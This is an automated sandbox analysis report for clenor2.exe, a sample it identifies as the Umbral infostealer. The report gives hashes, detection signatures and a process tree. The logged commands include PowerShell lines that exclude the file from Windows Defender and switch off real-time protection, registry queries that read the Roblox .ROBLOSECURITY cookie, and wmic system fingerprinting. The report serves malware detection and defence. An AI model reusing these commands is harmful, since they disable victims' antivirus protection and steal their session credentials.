Overview

overview

10

Static

static

10

clenor2.exe

windows7-x64

10

clenor2.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    17-11-2024 15:31

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    clenor2.exe

  • Size

    251KB

  • MD5

    42c9654eb3298b8d5f4d16d1ed0d749e

  • SHA1

    4fc97a7b2620c1ce483b1cc0ec18ce72c95ad74f

  • SHA256

    f637e4110044a636ee310796ac7659d7b80a2e9ece59d47287cf6b4fe4bd35e1

  • SHA512

    2e2ea79df165f7431aea4663c7cee5e43df0510ac2a03e17ff9bed4c5ffe1b9174bdb9060e985c831abf36cbf0942b1fa76da2d30b277e26b2b83a632aaf0599

  • SSDEEP

    6144:TloZMsrIkd8g+EtXHkv/iD4xxfibhS6FHAxDeebc+Yb8e1m0yi40D:RoZTL+EP8xxfibhS6FHAxDeebcX7n40D

Score
10/10
umbralexecutionspywarestealer

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Umbral family
    umbral
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\clenor2.exe
    "C:\Users\Admin\AppData\Local\Temp\clenor2.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2232
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2708
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\clenor2.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2624
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3028
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1284
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2988
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2896
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
        PID:300
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        2⤵
          PID:2160
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:1036
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic" path win32_VideoController get name
          2⤵
          • Detects videocard installed
          PID:2208

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
        Filesize

        7KB

        MD5

        c70b143085a9046d8f14982949f695b7

        SHA1

        133729da1e86e061bfc328438c7975d54dcd0d3f

        SHA256

        1e57839ddd6f7eeed3fd289160f36694cd7b4c4928fe45ba8bf32b96d11e94b4

        SHA512

        f36a3ab46b97b8734bb8a258f2d6400f39e62b24d2f8538a4dabc8473d7c27d5aecfcd36355033e420705f7bd20a73c48b0ac16377bcbbee2e037eb9b1c9c20e

        Download Submit

      • memory/1036-37-0x00000000027A0000-0x00000000027A8000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2232-0-0x000007FEF5E23000-0x000007FEF5E24000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2232-1-0x00000000011E0000-0x0000000001224000-memory.dmp

        Filesize

        272KB

        Download

      • memory/2232-2-0x000007FEF5E20000-0x000007FEF680C000-memory.dmp

        Filesize

        9.9MB

        Download

      • memory/2232-41-0x000007FEF5E20000-0x000007FEF680C000-memory.dmp

        Filesize

        9.9MB

        Download

      • memory/2624-7-0x000000001B6B0000-0x000000001B992000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/2624-8-0x0000000002810000-0x0000000002818000-memory.dmp

        Filesize

        32KB

        Download

      • memory/3028-14-0x000000001B740000-0x000000001BA22000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/3028-15-0x0000000002690000-0x0000000002698000-memory.dmp

        Filesize

        32KB

        Download